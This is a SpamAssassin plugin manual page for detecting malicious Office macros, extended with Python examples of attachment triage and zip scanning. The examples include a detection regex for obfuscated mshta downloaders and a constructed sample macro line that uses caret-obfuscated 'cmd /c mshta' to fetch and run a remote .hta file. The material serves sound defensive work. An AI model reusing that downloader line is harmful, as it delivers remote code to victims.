Mail::SpamAssassin::Plugin::OLEVBMacro(3) User Contributed Perl Documentation Mail::SpamAssassin::Plugin::OLEVBMacro(3)

Mail::SpamAssassin::Plugin::OLEVBMacro - scan Office documents for evidence of OLE Macros or other exploits

  loadplugin Mail::SpamAssassin::Plugin::OLEVBMacro

  ifplugin Mail::SpamAssassin::Plugin::OLEVBMacro
    body     OLEMACRO eval:check_olemacro()
    describe OLEMACRO Attachment has an Office Macro

    body     OLEOBJ eval:check_oleobject()
    describe OLEOBJ Attachment has an Ole Object

    body     OLERTF eval:check_olertfobject()
    describe OLERTF Attachment has an Ole Rtf Object

    body     OLEMACRO_MALICE eval:check_olemacro_malice()
    describe OLEMACRO_MALICE Potentially malicious Office Macro

    body     OLEMACRO_ENCRYPTED eval:check_olemacro_encrypted()
    describe OLEMACRO_ENCRYPTED Has an Office doc that is encrypted

    body     OLEMACRO_RENAME eval:check_olemacro_renamed()
    describe OLEMACRO_RENAME Has an Office doc that has been renamed

    body     OLEMACRO_ZIP_PW eval:check_olemacro_zip_password()
    describe OLEMACRO_ZIP_PW Has an Office doc that is password protected in a zip

    body     OLEMACRO_CSV eval:check_olemacro_csv()
    describe OLEMACRO_CSV Malicious csv file that tries to exec cmd.exe detected

    body     OLEMACRO_DOWNLOAD_EXE eval:check_olemacro_download_exe()
    describe OLEMACRO_DOWNLOAD_EXE Malicious code inside the Office doc that tries to download a .exe file detected

    body     OLEMACRO_URI_TARGET eval:check_olemacro_redirect_uri()
    describe OLEMACRO_URI_TARGET Uri inside an Office doc

    body     OLEMACRO_MHTML_TARGET eval:check_olemacro_mhtml_uri()
    describe OLEMACRO_MHTML_TARGET Exploitable mhtml uri inside an Office doc
  endif

This plugin detects OLE Macros or other exploits inside Office documents attached to emails. It can detect documents inside zip files as well as encrypted documents.
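As an added illustration of the zip handling this paragraph mentions (Python written for this page, not the plugin's own Perl), the block below builds a nested zip in memory, marks one member as password protected, and walks the archive under the default olemacro_num_zip, olemacro_zip_depth and olemacro_max_file values from the option list below. The per-archive member budget, the verdict labels and the placeholder member contents are assumptions of the example; the plugin's internal bookkeeping is not reproduced.

```python
"""Zip recursion limits of the OLEVBMacro plugin, illustrated in Python.

Added example, not the plugin's own code: constructs a nested zip in memory
and walks it under the documented olemacro_num_zip / olemacro_zip_depth /
olemacro_max_file limits, flagging members whose zip header carries the
encryption bit (the condition OLEMACRO_ZIP_PW reports on).
"""
import io
import re
import zipfile

# Defaults copied from this page's option list.
OLEMACRO_NUM_ZIP = 8
OLEMACRO_ZIP_DEPTH = 2
OLEMACRO_MAX_FILE = 1024000
OLEMACRO_ZIPS = re.compile(r"(?:zip)$", re.I)
OLEMACRO_MACRO_EXTS = re.compile(
    r"(?:docm|dotm|ppam|potm|ppst|ppsm|pptm|sldm|xlm|xlam|xlsb|xlsm|xltm|xps)$", re.I)

ZIP_FLAG_ENCRYPTED = 0x1  # bit 0 of the general purpose flag (zip spec)


def build_zip(members, encrypted=()):
    """Build a stored zip in memory (constructed test data, not a real sample).

    zipfile cannot write encrypted archives, so for names in `encrypted` the
    encryption bit is set by hand in the local file header (flag at +6) and
    the central directory entry (flag at +8) that precede the member name.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, body in members:
            zf.writestr(name, body)
    data = bytearray(buf.getvalue())
    for name in encrypted:
        raw, start = name.encode(), 0
        while (i := data.find(raw, start)) != -1:
            if i >= 30 and data[i - 30:i - 26] == b"PK\x03\x04":    # local header
                data[i - 24] |= ZIP_FLAG_ENCRYPTED
            elif i >= 46 and data[i - 46:i - 42] == b"PK\x01\x02":  # central dir
                data[i - 38] |= ZIP_FLAG_ENCRYPTED
            start = i + 1
    return bytes(data)


def walk_zip(data, prefix="", depth=1, num_zip=OLEMACRO_NUM_ZIP,
             max_depth=OLEMACRO_ZIP_DEPTH, max_file=OLEMACRO_MAX_FILE):
    """Yield (path, verdict) for members matching the macro or zip patterns.

    Assumptions of this example: the member budget is per archive, and the
    attached zip itself is depth 1, so zip_depth=2 enters one nested zip.
    """
    if num_zip == 0:                       # documented way to disable zip scanning
        return
    if depth > max_depth:
        yield (prefix.rstrip("/"), "depth_limit")
        return
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        yield (prefix.rstrip("/"), "not_a_zip")
        return
    seen = 0
    for info in zf.infolist():
        is_zip = bool(OLEMACRO_ZIPS.search(info.filename))
        is_macro = bool(OLEMACRO_MACRO_EXTS.search(info.filename))
        if not (is_zip or is_macro):
            continue                       # other members never count against the budget
        path = prefix + info.filename
        if seen >= num_zip:
            yield (path, "num_zip_limit")
            break
        seen += 1
        if info.flag_bits & ZIP_FLAG_ENCRYPTED:
            yield (path, "zip_password")   # decide before trying to extract
            continue
        if info.file_size > max_file:
            yield (path, "too_large")
            continue
        body = zf.read(info)
        if is_zip:
            yield from walk_zip(body, path + "/", depth + 1, num_zip, max_depth, max_file)
        else:
            yield (path, "macro")


def scan_attachment(data, **limits):
    """Dict of member path -> verdict for one attached zip."""
    return dict(walk_zip(data, **limits))


# Constructed sample: placeholder bodies stand in for real documents.
_LEVEL3 = build_zip([("too_deep.docm", b"placeholder")])
_LEVEL2 = build_zip([("level3.zip", _LEVEL3), ("inner.docm", b"placeholder")])
_PROTECTED = build_zip([("payload.docm", b"placeholder")], encrypted=("payload.docm",))
SAMPLE_ATTACHMENT = build_zip([
    ("readme.txt", b"not an Office file, never counted"),
    ("macro.docm", b"placeholder"),
    ("level2.zip", _LEVEL2),
    ("protected.zip", _PROTECTED),
])

if __name__ == "__main__":
    for path, verdict in scan_attachment(SAMPLE_ATTACHMENT).items():
        print(f"{verdict:14} {path}")
```

Setting the encryption bit by hand is only a way to construct a test archive without an external tool; the point for a detector is that the flag is readable from the central directory before any extraction is attempted, so a password-protected member can be reported without ever trying to open it. With the defaults, the third-level archive is reported as hitting the depth limit rather than being scanned; raising olemacro_zip_depth to 3 reaches the document inside it.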

This plugin requires the Archive::Zip and IO::String Perl modules.

The following options can be used in both site-wide ("local.cf") and user-specific ("user_prefs") configuration files to customize how the plugin handles attached documents.
olemacro_num_mime (default: 5)
Configure the maximum number of matching MIME parts (attachments) the plugin will scan.
olemacro_num_zip (default: 8)
Configure the maximum number of matching files inside a zip to scan. Set to 0 to disable zip scanning.
olemacro_zip_depth (default: 2)
Depth to recurse within zip files.
olemacro_extended_scan ( 0 | 1 ) (default: 0)
Scan all files for potential Office files and/or macros; the "olemacro_skip_exts" parameter is still honored. This option is off by default and is needed only for the "eval:check_olemacro_renamed" rule. If it is turned on, consider adjusting the values of "olemacro_num_mime" and "olemacro_num_zip", and expect more CPU overhead.
olemacro_prefer_contentdisposition ( 0 | 1 ) (default: 1)
Choose whether the filename from the Content-Disposition header is preferred over the name from the Content-Type header when the two disagree.
olemacro_max_file (default: 1024000)
Limit the number of bytes the plugin will decode and scan from the MIME objects (attachments).
olemacro_exts (default: (?:doc|docx|dot|pot|ppa|pps|ppt|rtf|sldm|xl|xla|xls|xlsx|xlt|xltx|xslb)$)
Set the case-insensitive regexp used to configure the extensions the plugin targets for macro scanning.
olemacro_macro_exts (default: (?:docm|dotm|ppam|potm|ppst|ppsm|pptm|sldm|xlm|xlam|xlsb|xlsm|xltm|xps)$)
Set the case-insensitive regexp used to configure the extensions the plugin treats as containing a macro.
olemacro_skip_exts (default: (?:dotx|potx|ppsx|pptx|sldx)$)
Set the case-insensitive regexp used to configure extensions the plugin skips entirely; only file types that are guaranteed to be macro free belong here.
olemacro_skip_ctypes (default: ^(?:text\/))
Set the case-insensitive regexp used to configure content types the plugin skips entirely; only content types that are guaranteed to be macro free belong here.
olemacro_zips (default: (?:zip)$)
Set the case-insensitive regexp used to configure extensions the plugin treats as zip files. Files matching the extension lists above are also tested for being zip archives.
olemacro_download_marker (default: (?:cmd(?:\.exe)? \/c ms\^h\^ta ht\^tps?:\/\^\/))
Set the case-insensitive regexp used to match the downloader command line embedded in the Office document's code.
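Pulling the option defaults together, as an added example (Python written for this page, not the plugin's Perl): the regexes below are the defaults from the list above, applied in the order skip-by-content-type, skip extensions, macro extensions, target extensions, zip extensions, and then everything else when olemacro_extended_scan is on. The magic-byte check standing in for the renamed-document rule, the part dictionaries, the constructed macro text and the verdict labels are assumptions of the example, not taken from the plugin.

```python
"""OLEVBMacro attachment triage, illustrated in Python.

Added example, not the plugin's own code: re-implements the documented
filename / content-type decisions so the effect of each option can be
tested against constructed attachments.
"""
import re

# Default values copied from the option list on this page (case-insensitive).
OLEMACRO_NUM_MIME = 5
OLEMACRO_MAX_FILE = 1024000
OLEMACRO_EXTENDED_SCAN = 0
OLEMACRO_PREFER_CONTENTDISPOSITION = 1
OLEMACRO_EXTS = re.compile(
    r"(?:doc|docx|dot|pot|ppa|pps|ppt|rtf|sldm|xl|xla|xls|xlsx|xlt|xltx|xslb)$", re.I)
OLEMACRO_MACRO_EXTS = re.compile(
    r"(?:docm|dotm|ppam|potm|ppst|ppsm|pptm|sldm|xlm|xlam|xlsb|xlsm|xltm|xps)$", re.I)
OLEMACRO_SKIP_EXTS = re.compile(r"(?:dotx|potx|ppsx|pptx|sldx)$", re.I)
OLEMACRO_SKIP_CTYPES = re.compile(r"^(?:text\/)", re.I)
OLEMACRO_ZIPS = re.compile(r"(?:zip)$", re.I)
OLEMACRO_DOWNLOAD_MARKER = re.compile(
    r"(?:cmd(?:\.exe)? \/c ms\^h\^ta ht\^tps?:\/\^\/)", re.I)

# File signatures used by this example's renamed check (assumption: the
# plugin's own heuristics are not reproduced). OOXML shares the zip
# signature, so a zip-looking blob is not called a renamed Office document.
OLE_CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
RTF_MAGIC = b"{\\rtf"


def pick_filename(part, prefer_cd=OLEMACRO_PREFER_CONTENTDISPOSITION):
    """Resolve the name when Content-Type and Content-Disposition disagree."""
    cd, ct = part.get("cd_filename"), part.get("ct_name")
    if cd and ct and cd != ct:
        return cd if prefer_cd else ct
    return cd or ct or ""


def classify(filename, content_type, extended_scan=OLEMACRO_EXTENDED_SCAN):
    """How the documented options treat a part, from name and type alone."""
    if OLEMACRO_SKIP_CTYPES.search(content_type or ""):
        return "skip"
    if OLEMACRO_SKIP_EXTS.search(filename):
        return "skip"
    if OLEMACRO_MACRO_EXTS.search(filename):
        return "macro"      # extension alone marks it as macro-bearing
    if OLEMACRO_EXTS.search(filename):
        return "office"     # scanned for embedded macros / objects
    if OLEMACRO_ZIPS.search(filename):
        return "zip"
    return "extended" if extended_scan else "ignore"


def looks_renamed(filename, data):
    """Name does not look like Office but the bytes do (needs extended scan)."""
    if classify(filename, None, extended_scan=1) != "extended":
        return False
    head = data[:OLEMACRO_MAX_FILE]
    return head.startswith(OLE_CFB_MAGIC) or head.startswith(RTF_MAGIC)


def has_download_marker(data):
    """Match the caret-obfuscated cmd.exe / mshta downloader the default marker describes."""
    text = data[:OLEMACRO_MAX_FILE].decode("latin-1")
    return OLEMACRO_DOWNLOAD_MARKER.search(text) is not None


def triage(parts, extended_scan=OLEMACRO_EXTENDED_SCAN):
    """Walk MIME parts under the num_mime limit and collect verdicts per filename."""
    verdicts, scanned = {}, 0
    for part in parts:
        name = pick_filename(part)
        kind = classify(name, part.get("content_type"), extended_scan)
        if kind in ("skip", "ignore"):
            continue
        if scanned >= OLEMACRO_NUM_MIME:
            break           # further matching parts are never scanned
        scanned += 1
        hits = [kind]
        if looks_renamed(name, part["data"]):
            hits.append("renamed")
        if has_download_marker(part["data"]):
            hits.append("download_exe")
        verdicts[name] = hits
    return verdicts


# Constructed sample parts (not real malware; the macro text is invented).
SAMPLE_PARTS = [
    {"ct_name": "report.xlsx", "cd_filename": "report.xlsx",
     "content_type": "application/octet-stream", "data": b"PK\x03\x04" + b"\x00" * 32},
    {"ct_name": "notes.txt", "cd_filename": "invoice.docm",      # headers disagree
     "content_type": "application/octet-stream",
     "data": OLE_CFB_MAGIC + b'Shell "cmd /c ms^h^ta ht^tp:/^/198.51.100.7/x.hta", vbHide'},
    {"ct_name": "template.dotx", "cd_filename": None,
     "content_type": "application/octet-stream", "data": b"PK\x03\x04"},
    {"ct_name": "readme.txt", "cd_filename": None,
     "content_type": "text/plain", "data": b"plain text, skipped by content type"},
    {"ct_name": "scan.pdf", "cd_filename": None,                  # OLE bytes, .pdf name
     "content_type": "application/octet-stream", "data": OLE_CFB_MAGIC + b"\x00" * 16},
]

if __name__ == "__main__":
    for name, hits in triage(SAMPLE_PARTS, extended_scan=1).items():
        print(f"{name}: {', '.join(hits)}")
```

Two things the run makes visible that the option text alone does not: the renamed .pdf is only reported when extended_scan is on, and the default download marker is narrow, matching one caret-obfuscated "cmd /c ms^h^ta ht^tp:/^/" form and not a plain "cmd /c mshta https://", so sites that lean on OLEMACRO_DOWNLOAD_EXE should expect to extend olemacro_download_marker.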
2022-03-21 perl v5.32.1
